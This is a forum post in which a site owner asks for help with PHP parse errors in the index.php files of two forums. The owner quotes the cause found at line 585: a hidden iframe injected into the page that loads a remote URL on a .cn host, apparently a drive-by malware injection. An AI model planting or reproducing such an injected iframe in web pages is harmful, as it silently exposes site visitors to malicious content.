Parse error

Hi All i am getting this error on my forum on a blank page .please help me how can i terminate this and also please tell me the how it happen ?
Parse error: syntax error, unexpected '<' in /home/*******/public_html/index.php on line 585

Also this one too

Parse error: syntax error, unexpected $end, expecting ',' or ';' in /home/*******/public_html/admincp/index.php on line 1123

this one too
Parse error: syntax error, unexpected '<', expecting T_VARIABLE or '$' in /home/******/public_html/gallery/index.php on line 423

actually Every Index file on my forum getting errors and i have 2 forums and i am facing this issue on both
 
i open the the index.php and on line 585 i see this
<iframe src="http://thelotmachine.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>

there is no other line after this
 
oooooooh but no loss occur everything is ok i have all the access in admincp and cpanal after i restore these index from my backup so i want to know how this was happen
and i got this on my two different forums on different domains and different hosts
 
hmmm maybe i have replace all the index.php files in my forum and now everything is fine but i am worried of happening this its strange.
